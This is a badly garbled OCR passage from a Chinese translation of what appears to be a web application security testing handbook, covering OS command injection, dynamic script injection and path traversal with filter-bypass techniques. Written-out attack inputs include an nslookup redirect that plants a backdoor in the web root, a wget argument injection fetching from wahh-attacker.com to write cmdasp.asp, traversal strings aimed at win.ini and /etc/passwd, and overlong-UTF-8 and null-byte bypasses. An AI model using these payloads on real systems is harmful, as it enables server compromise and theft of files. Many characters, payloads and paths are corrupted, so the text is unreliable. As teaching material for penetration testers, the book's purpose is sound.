笔者 曾 遇 到 这 样 的 情况 : 应 用 程序 向 操作 系统 命令 nslookup 传 递 用 户 输 入 ， 以 查找 用 户 提 
交 的 域名 的 卫 地 址 。 注 入 新 命令 所 需 的 元 字符 被 阻止 , 但 允许 使 用 < 和 > 字符 重 定 问 命 令 的 输入 和 
输出 。nslookup 命 令 通常 输入 某 个 域名 的 IP 地 址 ， 这 似乎 并 未 提供 任何 有 效 的 攻击 向 量 。 但是， 
如 采 在 这 时 提交 一 个 无 效 域名 ， 该 命令 就 会 输出 错误 消息 ， 并 在 其 中 包含 所 查询 的 域名 。 通 稍 ， 
这 种 行为 足以 导致 严重 的 攻击 。 
口 提供 一 个 服务 融 可 执行 的 脚本 代码 族 段 ， 以 蔡 代 要 解析 的 域名 。 可 以 将 这 段 脚本 放 在 引 
号 中 ， 以 确保 命令 解释 需 将 其 视 为 一 个 令 牌 。 
口 使 用 > 字符 将 命令 的 输出 重 定 回 到 Web 根 目录 下 的 可 执行 文件 夹 中 的 某 个 文件 。 由 操作 系 
统 执行 的 命令 如 下 所 示 : 
nslookup "[script codel" > [/path/to/executable file- 
口 运行 以 上 命令 时 ， 会 将 以 下 输出 重 定 向 到 可 执行 文件 : 
xx server can't find [script code]: NXDOMAIN 
口 然后 ， 使 用 浏览 各 调 用 该 文件 ， 注 入 的 脚本 代码 将 在 服务 右上 执行 。 由 于 大 多 数 脚 本 语 
言 允 许 页 面 同 时 包含 客户 端 内 容 和 服务 需 端 标记 ， 攻 击 者 无 法 控制 的 错误 消息 部 分 将 被 
视 为 明文 ， 并 且 会 执行 注入 脚本 中 的 标记 。 因 此 ， 攻 击 者 就 可 以 通过 利用 受 限 制 的 命令 
注入 条 件 ， 在 应 用 程序 服务 器 中 插入 一 个 不 受 限 制 的 后 门 。 
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尝试 访问 
http://mdsec.net/admin/18/ 





渗透 测试 步 双 


(1) < 和 > 学 符 分 别 用 于 将 一 个 文件 的 内 容 指 向 命令 的 输入 以 及 将 命令 的 输出 指 癌 一 个 文 








件 。 如 果 不 可 能 使 用 前 面 的 技巧 注入 一 个 完全 独立 的 命令 ,仍然 可 以 使 用 < 和 > 字符 读 取 及 写 
入 任意 文件 的 内 容 。 

(2) 应 用 程序 调用 的 许多 操作 系统 命令 接受 大 量 控制 其 行为 的 命令 行 参数 。 通 第 ， 用 户 提 
交 的 输入 以 这 种 参数 的 形式 传送 给 命令 处 理 , 只 需 在 相关 参数 后 插入 一 个 空格 , 就 可 以 在 空格 
后 谎 加 另外 一 个 参数 。 例 如 ， 一 个 Web 创 作 应 用 程序 可 能 拥有 一 项 功能 ， 人 允许 服务 融 获 得 一 个 
用 户 指 定 的 URL， 然 后 将 它 的 内 容 呈 现在 浏览 硕 上 进行 编辑 。 如 末 应 用 程序 调用 wget 程 序 ， 
那么 就 可 以 通过 附加 wget 使 用 的 -o 命 令 行 参 数 , 在 服务 融 的 文件 系统 中 写 人 任何 文件 的 内 容 。 
例如 : 


url=http://wahh-attacker.com/%20-O0%20c: \inetpub\wwwroot\scripts\ 
cmdasp.asp 























提示 许多 命令 注入 攻击 要 求 注 入 空格 以 分 隔 命 令 行 自 变量 。 如 果 攻 击 者 发 现 应 用 程 
¥Y 序 过 滤 空 格 , 并 且 攻 击 的 是 UNIX 平 台 , 那么 他 可 以 使 用 包含 空白 符 字 段 分 隔 符 的 SIFS 


环境 变量 代替 空格 。 





10.1.5 ”查找 动态 执行 漏洞 


动态 执行 源 洞 最 第 见于 PHP 和 Perl 等 语言 。 但 基本 上 ， 任 何 应 用 程序 平台 都 可 能 会 疝 基于 脚 
本 的 解释 右 (有 时 位 于 其 他 后 端 服务 带 上 ) 传送 用 户 提 区 的 输入 。 























渗透 测试 步 又 


(1) 用 户 提 交 的 所 有 数据 项 都 可 提交 给 动态 执行 函数 。 其 中 最 常见 的 数据 项 是 cookie 参 数 名 








称 和 参数 值 ， 以 及 作为 前 一 项 操作 结果 保存 在 用 户 资料 中 的 永久 数据 。 
(2) 尝试 轮流 向 目标 参数 提交 下 列 值 : 
;echo%20111111 


echo%20111111 
response.write%20111111 








:response.write%20111111 
(3) 监控 应 用 程序 的 响应 。 如 果 字 符 串 111111 被 单独 返回 ( 即 它 前 面 没有 其 他 命令 字符 
串 )， 就 表示 应 用 程序 可 能 易于 受到 脚本 命令 注入 。 
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(4) 如 果 字 符 串 111111 并 未 返回 ,寻找 任何 表示 输入 被 动态 执行 的 错误 消息 ; 另外 ， 可 能 
需要 对 语法 进行 调整 ， 以 实现 注入 任意 命令 的 目的 。 

(5) 如 果 攻 击 的 应 用 程序 使 用 PHP， 可 以 使 用 测试 字符 串 phpinfo () 。 如 果 它 成 功 执行 ， 
应 用 程序 将 返回 PHP 环 境 的 配置 信息 。 

(6) 如 果 应 用 程序 可 能 易于 受到 攻击 ， 与 前 面 描述 的 查找 OS 命令 注入 漏洞 时 一 样 ， 注 人 一 
些 造成 时 间 延 迟 的 命令 确认 这 一 点 。 例 如 : 


system('ping%20127.0.0.1') 














10.1.6 ”防止 OS 命令 注入 


通常 来 说 ， 防 止 OS 命令 注入 漏洞 的 最 佳 方法 是 完全 避免 直接 调用 操作 系统 命令 。 几 乎 Web 
应 用 程序 所 需要 执行 的 每 个 任务 都 可 以 使 用 内 置 API 完 成 ， 而 且 攻 击 者 无 法 控制 这 些 API， 使 其 
执行 其 他 预料 之 外 的 命令 。 

如 果 无 法 避免 要 在 传送 给 操作 系统 命令 解释 需 的 命令 字符 串 中 插入 用 户 提 交 的 数据 , 应 用 程 
序 应 实施 严格 的 防御 来 防止 漏洞 发 生 。 如 果 可 能 ， 应 使 用 一 份 “ 白 名 单 ” 限 制 用 户 只 输入 一 组 特 
丈 的 仁 。 或 者 ,应 将 输入 范围 限制 为 少数 字符 ， 例 如 ， 仅 字母 数字 字符 。 应 拒绝 包含 任何 其 他 数 
据 《〈 包 括 任 何 元 字符 或 空白 符 ) 的 输入 。 

应 用 程序 应 使 用 命令 API 通 过 它 的 名 称 和 命令 行 参数 启动 特殊 的 进程 ， 而 不 是 回 文 持 命令 链 
接 与 重 定 回 的 shell 解 释 融 传送 命令 字符 串 , 从 而 实施 男 一 层 保护 ,例如 , Java APIRuntime .exec 
和 ASPNET API Process .Start 并 不 支持 shell 元 字符 ， 如 果 使 用 得 当 ， 它 们 能 够 确保 仅 执 行 开 
发 者 想 要 执行 的 命令 。 请 参阅 第 19 章 了 解 与 命令 执行 API 有 关 的 详情 。 


10.1.7 ”防止 脚本 注入 漏洞 


通常 而 言 , 防止 脚本 注入 源 洞 的 最 佳 方法 是 , 避免 将 用 户 提交 的 输入 或 者 来 日 用 户 的 数据 传 
送 给 任何 动态 执行 或 包含 函数 。 如 末 由 于 茶 种 原因 必须 传送 用 户 提交 的 输入 , 那么 应 对 相关 输入 
进行 严格 的 确认 检查 以 阻止 任何 攻击 。 如 有 可 能 ,使 用 一 份 由 已 知 可 菲 的 值 组 成 的 “日 名 单 ”， 
并 拒绝 任何 没有 出 现在 这 个 名 单 上 的 输入 。 如 来 无 法 做 到 这 一 点 , 应 根据 一 组 已 知 无 害 的 字符 [如 
字母 数字 字符 《空白 人 符 除外 ) ] 检 查 在 输入 中 使 用 的 字符 。 


10.2 ”操作 文件 路 径 


Web 应 用 程序 中 的 许多 功能 通 第 部 知 要 处 理 用 户 以 文件 或 目录 名 提交 的 输入 。 一 般 情 况 下 ， 
这 些 输入 会 传递 给 接受 文件 路 径 的 API (例如, 用 于 检索 本 地 文件 系统 中 的 文件 )。 应 用 程序 将 在 
它 对 用 户 请 求 的 啊 应 中 处 理 该 API 调 用 的 结果 。 如 果 用 户 提 交 的 输入 未 经 过 正确 确认 ， 这 种 行为 
就 可 能 导致 各 种 安全 着 洞 ， 其 中 最 常见 的 是 文件 路 径 这 历 涯 洞 和 文件 包含 漏洞 。 






























































10.2.1 
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路 人 径 遍历 漏洞 








如 采 应 





总 用 程序 使 用 用 户 可 控制 的 数据 、 以 危险 的 方式 访问 位 于 应 用 程序 服务 天 或 其 他 后 端 文 











件 系统 中 


的 文件 和 目录 ， 束 会 出 现 路 径 遍 历 源 洞 。 通 过 提交 专门 设计 的 输入 , 攻击 者 就 可 以 在 被 


访问 的 文件 系统 中 读 取 或 者 写 入 任意 内 容 。 这 种 漏洞 往往 使 攻击 者 能 够 从 服务 硕 上 该 取 人 敏感 信 息 


或 者 重 写 
在 下 
查询 字符 








敏感 文件 ， 并 最 终 在 服务 桌 上 执行 任何 命令 。 
面 的 示例 中 , 应 用 程序 使 用 一 个 动态 页 面 丫 客户 瑞 返回 静态 图 像 。 被 请 求 图 像 的 名 称 在 
串 参 数 中 指定 








http://mdsec.net/filestore/3/GetrFile.ashx?filename=keira.1jpg 


当 服 


务 仙 处 理 这 个 请 求 时 ， 它 执行 以 下 操作 。 


(1) 从 查询 字符 串 中 提取 filename 参 数值 。 
(2) 将 这 个 值 附 加 在 c:\filestore\ 之 后 。 
(3) 用 这 个 名 称 打开 文件 。 

(4) 讯 取 文件 的 内 容 并 将 其 返回 给 客户 问 。 


省 酒 
名 内 ， 从 第 
序列 表示 





之 所 以 会 发 生 ， 是 因为 攻击 者 可 以 将 路 径 裔 历 序 列 (path traversal sequence ) 放 和 文件 
名 (2) 步 指定 的 图 像 目录 向 上 回 滴 ， 从 而 访问 服务 右上 的 任何 文件 。 众所周知， 路 径 遍 历 
为 “点 -点 - 斜 线 ”( ..\), 一 个 典型 的 攻击 如 下 : 








http://mdsec.net/filestore/8/GetFile.ashx?filename=..\wWwindows\Win.1ini 











如 果 


C:\f 


应 用 程序 把 Eilename 人 参数 的 值 附 加 到 图 像 目 录 名 称 之 后 ， 就 得 到 以 下 路 径 : 


jlestore\..\Wwindows\win. 1ini 














这 两 个 思 历 序列 立即 从 图 像 目录 回溯 到 C: 驱动 厅 根 目录 下 ， 因 此 前 面 的 路 径 等 同 于 以 下 路 





C: “WINdOWS\Win. 1n1l 


此 ， 服 务 帮 不 会 运 回 图 像 文 件 ， 而 是 返回 默认 的 Windows 配置 文件 。 








注解 ”在 旧版 Windows IIS Web 服 务 器 中 ， 上 默认 情况 下 ,应 用 程序 将 在 本 地 系统 权限 
下 运行 ， 因 而 能 够 访问 本 地 文件 系统 上 的 任何 可 读 文 件 。 在 较 新 的 版 本 中 ， 和 许多 其 
他 Web 服 务 器 一 样 ， 服 务 器 进程 默认 以 权限 较 低 的 用 户 账 户 运行 。 因 此 ， 在 探查 路 径 


遍历 漏洞 时 ， 最 好 是 请 求 一 个 可 由 任何 类 型 的 用 户 读 取 的 默认 文件 ， 如 cwindows， 


Wln.Inl。 





在 这 个 简单 的 示例 中 ,应 用 程序 并 未 实施 防御 ,阻止 路 径 裔 历 攻击 。 然 而 ， 由 于 这 些 攻击 早 
已 广为人知 ， 应 用 程序 通常 会 针对 它们 实施 各 种 防御 ， 大 多 数 情况 下 是 采取 输入 确认 过 滤 。 在 后 
文中 会 讲 到 ， 这 些 过 小 往往 并 不 可 徘 ,可 被 搁 术 熟练 的 攻击 者 轻易 吉 开 。 
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尝试 访问 


http://mdsec.net/filestore/8/ 


1. 查找 和 利用 路 径 遍 历 漏洞 

许多 功能 都 要 求 Web 应 用 程序 根据 用 户 在 请 求 中 提交 的 参数 向 文件 系统 读 取 或 写 入 数据 。 
如 果 以 不 安全 的 方式 执行 这 些 操作 ,攻击 者 就 可 以 提交 专门 设计 的 输入 ,使 应 用 程序 访问 开发 
者 并 不 希望 它 访问 的 文件 。 这 类 漏洞 称 为 0D 口 口 口 (path traversal ) 漏洞 ， 攻 击 者 可 利用 这 种 
漏洞 谈 取 密码 和 应 用 程序 日 志 之 类 的 敏感 数据 ， 或 者 重 写 安全 性 至 关 重 要 的 数据 项 ， 如 配置 文 
件 和 软件 代码 。 在 最 为 严重 的 情况 下 ， 这 种 漏洞 可 使 攻击 者 能 够 完全 攻破 应 用 程序 与 基础 操作 
系统 。 

有 时 ， 路 径 遍 历 漏洞 很 难 发现 ， 并 且 许 多 Web 应 用 程序 对 它们 实施 的 防御 也 十 分 脆弱 。 下 面 
我 们 将 介绍 攻击 者 在 确定 淤 在 的 目标 、 探 查 吻 用 攻击 的 行为 、 避 开 应 用 程序 防御 以 及 处 理 定 制 编 
但 的 过 程 中 所 采用 的 各 种 技巧 。 

e000000 

在 对 应 用 程序 进行 初步 解析 的 过 程 中 , 应 该 已 经 确定 了 所 有 与 路 径 侦 历 漏 洞 有 关 的 明显 受 攻 
击 面 。 主 要 用 于 文件 上 传 或 下 载 目的 的 所 有 功能 都 应 进行 全 面 测试 。 用 户 可 共 训 文档 的 工作 流程 
应 用 程序 ， 人 允许 用 户 上 传 图 像 的 博客 与 拍卖 应 用 程序 ,以 及 为 用 户 提 供电 子 书 、 技 术 手 册 和 公司 
报表 等 文档 的 信息 型 应 用 程序 ， 笛 向 使 用 这 种 功能 。 

除 这 种 明显 的 目标 功能 外 ， 还 有 其 他 各 种 行为 表示 应 用 程序 需要 与 文件 系统 进行 交互 。 
















































































渗透 测试 步 又 


(1) 分 析 在 应 用 程序 解析 过 程 中 收集 到 的 信息 ， 确 定 以 下 内 容 。 

















口 请 求 参 数 中 明显 包含 文件 或 目录 名 称 的 所 有 情形 。 例 如 ，includqe=main.inc 或 
template= /en/sSlIdqebaro。 
口 需要 从 服务 前 文件 系统 ( 相对 于 后 剖 数 据 库 ) 读 取 数据 的 所 有 应 用 程序 功能 。 例如 ， 
显示 办 公文 档 或 图 像 。 
(2) 在 测试 其 他 漏洞 的 过 程 中 ， 寻 找 有 益 的 错误 消息 或 其 他 反 间 事件 。 设 法 确定 用 户 提 交 
的 数据 被 传送 给 文件 API 或 作为 操作 系统 命令 参数 的 所 有 情况 。 





提示 。 如果 攻击 者 已 经 从 本 地 访问 应 用 程序 | 通过 了 和 白 盒 测试 ( white-box testing )， 或 者 


Y 因为 已 经 攻破 了 服务 器 的 操作 系统 |， 那么 往往 能 够 直接 确定 路 径 人 遍历 目标 ， 因 为 他 可 
以 监控 应 用 程序 与 文件 系统 之 间 的 全 部 交互 。 
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渗透 测试 步骤 

如 果 能 够 从 本 地 访问 应 用 程序 ， 执 行 以 下 操作 。 

(1) 使 用 适当 的 工具 监控 服务 需 上 的 所 有 文件 系统 活动 。 例 如 ， 可 以 在 Windows 平台 上 使 
用 SysInternals 开 发 的 FileMon 工 具 ， 在 Linux 平 人 台 上 使 用 ltrace/strace 工 具 ， 在 Sun Solaris 








平台 上 使 用 truss 命 令 。 
(2) 在 每 一 个 被 提交 的 参数 ( 包括 全 部 cookie、 查 询 字符 串 字 段 和 POST 数据 项 ) 中 插入 一 


个 特殊 的 字符 串 (ueraversaltese 测试 应 用 程序 的 每 “Di a 
行 测试 ， 并 使 用 第 14 革 描述 的 日 动 技 巧 加 速 测试 过 程 。 
(3) 在 文件 系统 监控 工具 中 设置 一 个 过 滤 人 种， 确定 所 有 包含 测试 字符 串 的 文件 系统 事件 。 
(4) 如 果 发 现 测试 字符 串 被 用 作文 件 或 目录 ， 或 者 出 现在 文件 或 目录 名 中 ， 那 么 对 每 一 种 
情况 进行 测试 《如 下 所 述 )， 确 定 其 是 否 易 于 受到 路 径 授 历 攻 击 。 























elUUUUUUDO 

硝 定 各 种 浴 在 的 路 径 调 历 测 试 目 标 后 ,必须 分 别 测试 每 种 情况 , 弄 消 其 是 否 以 不 安全 的 方式 
加 相关 文件 系统 操作 传送 用 户 可 控制 的 数据 。 

在 测试 用 户 提交 的 参数 时 , 需 确 定 遍 历 序列 是 否 被 应 用 程序 阻止 , 或 者 它们 是 否 能 够 正常 工 
作 。 通 常 ， 提 交 不 会 辐 上 回 洲 到 起 始 上 日 录 的 过 历 序列 是 一 种 较为 可 徘 的 初步 测试 方法 。 























渗透 测试 步 又 


(1) 假设 所 针对 的 参数 被 附加 到 应 用 程序 预先 设 定 的 目录 之 后 ， 那 么 插入 任意 一 个 子 目录 














和 一 个 让 历 序列 ， 修 改 参 数 的 值 。 例 如 ， 如 有 果 应 用 程序 提交 参数 

£1]e@sfo0/fE1lel ,tte 

那么 可 以 答 试 提交 以 下 值 : 

和 EoD ar Fl lee 

如 果 两 种 情况 下 应 用 程序 的 行为 完全 相同 ， 就 表示 人 它 易于 受到 攻击 。 应 该 继续 进行 测试 ， 
答 试 通过 四 上 回溯 到 起 始 目 录 来 访问 不 同 的 文件 。 

(2) 在 上 述 两 种 情况 下 ， 如 末 应 用 程序 的 行为 有 所 不 同 ， 那么 应 用 程序 可 能 阻止 、 删 除 或 
滔 化 遍历 序列 ,致使 文件 路 径 失 效 。 需 要 人 研究 是 否 可 通过 其 他 方法 避 开 应 用 程序 的 确认 过 滤 ( 请 
参阅 下 面 讨论 的 内 容 )。 

即使 子 日 录 “bar” 并 不 存在 ， 这 个 测试 仍然 有 效 ， 因 为 大 多 数 文 件 系 统 在 尝试 获取 文件 
路 径 前 对 其 进行 了 规范 化 。 路 径 序 列 删除 了 虚构 的 目录 ， 因 此 服务 天 并 不 检查 它 是 否 存在 。 


























如 有 果 发 现 提 交 表 历 序列 但 不 向 上 回溯 至 起 始 目 录 不 会 影响 应 用 程序 的 行为 , 那么 在 接 下 来 的 
测试 中 ， 应 该 答 试 届 历 出 起 始 目录 ， 从 服务 带 文 件 系统 的 其 他 地 方 访问 文件 。 
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渗透 秀 测试 步 





Te Y 用 程序 功能 只 拥有 文件 读 取 访问 权限 ， 那 么 尝试 访问 相关 操作 系统 上 
的 一 个 已 知 任何 用 户 均 可 读 取 的 文件 。 提 交 下 面 其 中 一 个 值 作为 受 控制 的 文件 名 参数 ， 


/el oS Swe 
人 人 人 人 人 人 人 人 人 人 人 wmneleows analnail 


驻 运 的 话 ， 浏 览 大 将 显示 请 求 的 文件 的 内 容 ， 如 图 10-5 所 示 。 





Eee 区 可 


fs 
人 | 参 https://mdsec.net/f e/30/GetFile,ashx?filename= ndows = 郧 名 GX i 


| | 情 mdsec,net | | 














:for 16-bit app support [fonts] [extensions] [mci extensions] [flles| [Mall MAPI=]1 [MCI Extensions. BAK]| 
al-MPEGVideo afc=MPEGVideo alf=MPEGVideo asf=-MPEGVideo asx=MPEGVideo au—=MPEGVideo 
ml 一 MPEGVideo m3u=MPEGVideo mp2=MPEGVideo mp2v=MPEGVideo mp3=MPEGVideo 
mpa=MPEGVideo mpe=MPEGVideo mpeg—=MPEGVideo mpe=MPEGVideo mpv2=MPEGVideo 
snd=MPEGVideo wax=MPEGVideo wm=MPEGVideo wma=MPEGVideo wnw=MPEGVideo 
wmx—=MPEGVideo wpFMPEGVideo wvx=MPEGVIideo 


100% 








图 10-5 成功 的 路 径 遍 历 攻 击 


(2) 如 果 所 攻击 的 功 和 有 拥有 文件 与 人 访问 权限 ， 那么 要 最 终 确 定 应 用 程序 是 否 易于 有 党 到 攻 
击 , 可 能 会 更 困难 。 通常 , 一 种 有 效 的 测试 是 党 试 写 人 两 个 文件 , 一 个 文件 可 被 任何 用 户 写 入 ， 
另 一 个 文件 即使 是 根 用 户 或 管理 员 也 禁止 写 和 人 。 例 如 ， 在 Windows 平台 上 可 以 尝试 写 入 下 面 
两 个 文件 : 


人 
/N/V YA Nm GOmniilo7/ SS 


在 UNIX 平 人 台 上 ， 茶 止 根 用 户 写 入 的 文件 取决 于 使 用 的 平台 版 本 ,但 尝试 用 一 个 文件 重 写 
一 个 目录 绝 不 可 能 取得 成 功 ， 因 此 可 以 进行 以 下 尝试 : 


/te /ltt eC Sl ts Sls 
ne 


在 上 面 的 每 对 测试 中 ,如 果 应 用 程序 在 啊 应 两 个 请 求 时 表现 出 行为 差异 〈 例 如， 啊 应 第 二 
个 请 求 时 返回 一 条 错误 消息 ， 而 响应 第 一 个 请 求 时 不 返回 错误 消息 )， 那 么 应 用 程序 可 能 易于 
受到 攻击 。 

(3) 还 有 男 一 种 方法 可 通过 写 入 访问 确定 过 历 漏 洞 , 即 尝试 在 Web 服 务 右 的 Web 根 目录 中 与 
人 一 个 新 文件 ， 然 后 尝试 通过 浏览 右 获 得 这 个 文件 。 但 是 ， 如 果 并 不 知道 Web 根 目录 的 位 置 ， 
或 者 访问 文件 的 用 户 并 不 拥有 写 入 权限 ， 这 种 方法 可 能 不 会 成 功 。 
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注解 ”几乎 每 一 种 文件 系统 都 接受 试图 向 上 回溯 到 文件 系统 根 目 录 的 多 余 遍 历 序列 。 
因此 ， 当 探查 漏洞 时 ， 像 在 上 面 的 示例 中 一 样 ， 最 好 提交 大 量 的 遍历 序列 。 附 加 数据 
的 起 始 目录 可 能 位 于 文件 系统 的 “ 深 处 ”， 因 此 使 用 大 量 的 序列 有 助 于 避免 错误 警报 。 





而 有 全 ，Windows 平 台 接 受 人 针线 (/) 和 反 斜 线 (\) 作为 目录 分 隔 符 ， 而 UNIX 平 台 

只 接受 锋线 作为 分 隔 符 。 另 外 ， 一 些 Web 应 用 程序 过 滤 两 者 之 一 。 即 使 完全 确信 Web 

服务 器 运行 的 是 UNIX 操 作 系 统 , 但 应 用 程序 仍然 可 能 被 Windows 后 端 组 件 调 用 。 为 此 ， 
当 探 查 遍 历 漏洞 时 ， 最 好 两 者 都 进行 测试 。 





e00000000O 

最 初 的 过 历 攻 击 尝试 ( 如 前 所 述 ) 并 未 成 功 ， 并 不 意味 着 应 用 程序 不 容易 受到 攻击 。 许 多 应 
用 程序 开发 者 意识 到 路 径 壳 历 漏洞 ， 并 执行 各 种 输入 确认 检查 尝试 防止 这 种 漏洞 。 但 是 , 这 些 防 
ed 

一 种 常见 的 输入 过 滤 方 法 如 下 ,首先 检查 文件 名 参数 中 是 否 存在 任何 路 径 遍 历 序列 ， 如 果 

存在 ， A 青 求 ， 要 么 尝试 删除 该 序列 ， a J 了 净化 。 这 种 类 型 的 过 
滤 往 往 易于 受到 各 种 攻击 , 它们 使 用 编码 或 其 他 方法 来 避 开 过 滤 。 这 类 攻击 全 都 利用 输入 确认 机 
制 所 面临 的 规范 化 问题 ， 我 们 在 第 2 章 已 经 讲 过 。 





























渗透 疯 | 试 步 


(1) mm | 试 。 许 多 输入 过 小 仪 检查 其 中 





一 种 序列 ， 而 文件 系统 却 支 持 全 部 两 种 序列 。 
(2) 洋 试 使 用 下 面 的 编码 方案 ， 对 裔 历 序 列 进行 简单 的 URL 编 码 。 一 定 要 对 输入 中 的 每 一 
个 和 斜 线 与 点 进行 编码 : 
口 点 一 一 %2e 
国 
5C 


(3) 答 试 使 用 下 面 的 16 位 Unicode 编 码 : 








口 点 一 一 S$u002e 
口 人 冬 线 一 一 S$u2215 
S2216 








(4) 尝试 使 用 下 面 的 双 们 URL 编码 : 
$252e 

口 和 斜 线 %$252f 
四 
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(5) 沦 试 使 用 下 面 的 超 长 UTF-8 Unicode 编 码 : 





口 点 一 一 $c0%82e、%Se0%40%ae、%Sc0ae 等 
口 冬 线 一 一 $c0%af、%e0%80%af、%c0%2f 等 
口 反 冬 线 sc0g%5c 、g%c0gs80gs5c 等 








可 以 在 Burp Intruder 中 使 用 非法 Unicode 有 效 载 傈 类 型 为 任何 特殊 字符 生成 大 量 其 他 形式 
的 表示 法 ， 并 将 它 提交 到 目标 参数 的 相关 人 位置。 这些 表示 法 严重 违反 了 Unicode 表 示 法 规则 ， 
但 却 为 许多 Unicode 解 公 需 接受 ， 特 别 是 Windows 平 台 上 的 解码 送 。 

(6) 如 有 果 应 用 程序 尝试 通过 删除 遍历 序列 来 净化 用 户 输 入 ,但 没有 以 递归 的 方式 应 用 这 种 
过 滤 ， 那 么 可 以 用 一 个 序列 和 蔡 换 另 一 个 序列 来 避 开 过 滤 。 例 如 : 

人 

AI/ 


SA 
SS 























尝试 访问 





http://mdsec.net/filestore/30/ 
http://mdsec.net/filestore/39/ 
http://mdsec.net/filestore/46/ 
http://mdsec.net/filestore/S9/ 
http://mdsec.net/filestore/65/ 





第 二 种 防御 路 径 近 历 攻 击 时 常用 的 输入 过 滤 ， 殊 古 确 认 用 户 提 交 的 输入 是 否 包 含 应 用 程序 
想 要 的 后 级 ( 如 文件 类 型 ) 或 前 级 ( 如 起 始 目 录 )。 这 种 类 型 的 防御 可 以 与 前 面 描述 的 过 滤 联 合 
使 用 。 











渗透 测试 步 又 
(D 一 些 应 用 程序 检查 用 户 提交 的 文件 是 否 以 一 种 或 一 组 特殊 的 文件 类 型 结尾 ， 并 拒绝 访 

















问 其 他 内 容 的 请 求 。 有 了 时候， 可 以 在 请 求 的 文件 名 后 放 入 一 个 URL 编 码 的 空 学 广 , 在 后 面 连接 
应 用 程序 接受 的 文件 类 型 ， 从 而 避 开 这 种 检查 。 例 如 : 

A ele oe lo ee 

这 种 攻击 有 时 会 成 功 , 是 因为 应 用 程序 使 用 API 在 托管 执行 环境 下 执行 文件 类 型 检查 , 该 
执行 环境 允许 字符 串 包含 空 字 符 ( 如 Java 中 的 string .endsWith() ) 。 但 是 ， 当 获取 文件 时 ， 
应 用 程序 最 终 在 一 个 无 法 控制 的 环境 (其 中 的 字符 串 以 空白 字符 结束 ) 中 使 用 API， 因 此 文件 
名 被 截 短 为 想 要 的 值 。 

(2) 一 些 应 用 程序 将 它们 自己 的 文件 类 型 后 级 附加 在 用 户 提 交 的 文件 名 后 ， 演 试 控制 被 访 
问 的 文件 类 型 。 在 这 种 情况 下 ， 基 于 相同 的 原因 ， 前 面 的 任何 一 种 利用 都 可 能 取得 成 功 。 
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(3) 一 些 应 用 程序 检查 用 户 提 交 的 文件 名 的 开头 部 分 是 否 为 起 始 目录 的 茶 一 个 子 目 录 ， 或 
者 一 个 特殊 的 文件 名 。 当 然 ， 通过 以 下 方法 可 轻易 避 开 这 种 检查 : 

EE 

(4) 如 末 以 上 和 针对 输入 过 小 的 攻击 都 无 法 成 功 ， 可 能 应 用 程序 实施 了 儿 种 类 型 的 过 小 ， 因 
此 需要 同时 使 用 上 面 的 几 种 攻击 方法 ( 同时 针对 裔 历 序列 过 滤 与 文件 类 型 或 目录 过 小 )。 遇 到 
这 种 情况 ， 如 有 可 能 ， 最 好 的 办 法 是 将 问题 分 解 成 儿 个 独立 的 阶段 。 例 如 ， 如 果 请 求 

diagram1 .jpg 
能 够 成 功 ， 但 请 求 

foo/. ./aiagraml1.jpg 
却 导致 失败 ,那么 尝试 使 用 所 有 可 能 的 遍历 序列 ， 直 到 第 二 个 请 求 获得 成 功 。 如 果 使 用 这 些 成 
功 的 遍历 序列 仍然 无 法 访问 /etc/passwda， 就 请 求 以 下 文件 ， 检 查 应 用 程序 是 否 实施 任何 文 
件 类 型 过 滤 ， 以 及 是 否 可 以 避 开 这 种 过 滤 : 

diagraml .jpg%00.jpg 

彻底 检查 应 用 程序 定义 的 起 始 目录 , 设法 了 解 它 实施 的 全 部 过 滤 , 看 是 否 可 以 利用 上 述 技 
巧 避 开 每 一 种 过 小 。 

(5) 当然 ， 如 末 能 够 随意 访问 应 用 程序 ， 那 么 攻击 就 变 得 更 加 简单， 因为 渗透 测试 员 可 以 
系统 性 地 攻击 每 种 输入 ， 并 最 终 确 定 通 过 哪些 文件 名 ( 如 果 有 ) 可 以 到 达 文 件 系统 。 



































ei0DUUDUDU 

我 们 曾经 见 到 ,应 用 程序 采用 的 文件 名 编码 方 采 最 终 以 危险 的 方式 进行 处 理 , 模糊 处 理 也 不 
能 提供 任何 安全 保障 ， 这 时 就 会 出 现 最 为 可 怕 的 路 径 遍 历 漏洞 。 

例如 , 一些 应 用 程序 具有 某 种 工作 流程 功能 ， 人 允许 用 户 上 传 与 下 载 文件 。 执行 上 传 操 作 的 请 
求 提供 一 个 文件 名 参数 ， 它 在 写 入 文件 时 易于 受到 路 径 裔 历 攻 击 。 如 果 一 个 文件 成 功 上 传 , 那么 
应 用 程序 再 为 用 户 提 供 一 个 下 载 URL。 这 里 有 两 点 值得 注意 。 

口 应 用 程序 核对 将 要 写 入 的 文件 是 否 已 经 存在 ， 如 果 存 在 ， 就 拒绝 重 写 这 个 文件 。 

口 为 下 载 用 户 文件 而 生成 的 URL 使 用 一 种 定制 模糊 处 理 方案 表示 。 这 种 方案 似乎 是 一 种 定 

制 的 Base64 编 码 形式 ， 它 在 每 个 编码 文件 名 位 置 使 用 一 组 不 同 的 字符 。 

总 的 来 说 ,这 些 注意 点 给 直接 利用 漏洞 设立 了 障 但。 首先 ,尽管 能 够 在 服务 需 文 件 系统 中 写 
入 任何 文件 ， 但 攻击 者 却 无 法 重 写 任何 现 有 的 文件 ， 而 且 ，Web 服 务 大 进程 拥有 的 较 低 权限 意味 
者 攻击 者 不 可 能 在 任何 有 利 位 置 创 建新 文件 。 其 次 ， 如 果 不 对 定制 编码 进行 逆 回 工程 ,攻击 者 也 
不 可 能 请 求 任意 一 个 现 有 的 文件 (如 /etc/passwd )。 

一 个 人 简单 的 实验 就 可 以 证 明 模 糊 处 理 后 的 URL 包 含 用 户 最 初 提交 的 文件 名 字符 串 , 如 下 所 示 。 

口 test .txt 变 成 zZMLYTU4NTY2Y。 

口 foo/ . . /test .txt 变 成 B1NzUyMzE0ZjQ0ONJjMzND。 
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编码 后 的 URL 之 间 的 长 度 差异 表明 ， 在 应 用 编码 之 前 ， 应 用 程序 并 未 对 其 进行 路 径 规范 化 。 
这 种 行为 让 攻击 者 有 机 会 对 漏洞 加 以 利用 。 首 先 通过 以 下 名 称 提 交 一 个 文件 : 
.. 7../../../../../.etcrpasswaQ/../. .mptoc 
它 的 规范 化 形式 为 : 
/tmp/foc 
因此 可 以 被 Web 服 务 器 写 信 。 上 传 这 个 文件 将 生成 以 下 包含 模糊 处 理 文件 名 的 下 载 URL: 
FNWwUkIrNXFIUVEJOZWIKNIRSUKSNazZE2V1IRKTMFrMHAUDXBWZWS TIN1IdYaESlk 
要 修改 这 个 值 以 返回 文件 /etc/passwa， 只 需 从 右边 将 其 截 短 成 
